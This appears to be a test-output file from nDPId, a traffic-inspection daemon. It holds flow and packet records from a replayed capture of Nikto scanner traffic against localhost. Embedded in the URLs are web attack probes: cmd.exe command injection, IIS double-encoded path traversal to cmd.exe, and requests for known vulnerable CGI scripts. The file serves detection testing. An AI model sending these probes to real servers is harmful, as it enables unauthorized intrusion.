-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 